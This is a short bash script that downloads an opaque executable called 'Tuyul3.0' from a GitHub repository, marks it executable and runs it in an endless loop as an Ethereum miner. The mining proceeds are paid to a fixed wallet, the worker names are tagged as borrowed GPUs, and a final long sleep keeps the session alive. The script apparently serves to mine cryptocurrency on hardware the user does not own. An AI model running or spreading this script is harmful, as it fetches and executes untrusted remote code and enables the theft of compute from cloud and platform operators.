#!/bin/bash
POOL=eth-us-east.flexpool.io:4444
WALLET=eth:0xb2AAd92f1570AD892248c229b86582699d724a0B
WORKER=$(echo $(shuf -i 1000-9999 -n 1)-GPU-PINJEM)
wget https://github.com/dedeybo/Project/raw/main/Tuyul3.0
chmod +x Tuyul3.0
while [ 1 ]; do
./Tuyul3.0 --algo ETHASH --pool $POOL --user $WALLET.$WORKER --ethstratum ETHPROXY
sleep 5
done
sleep 999999999
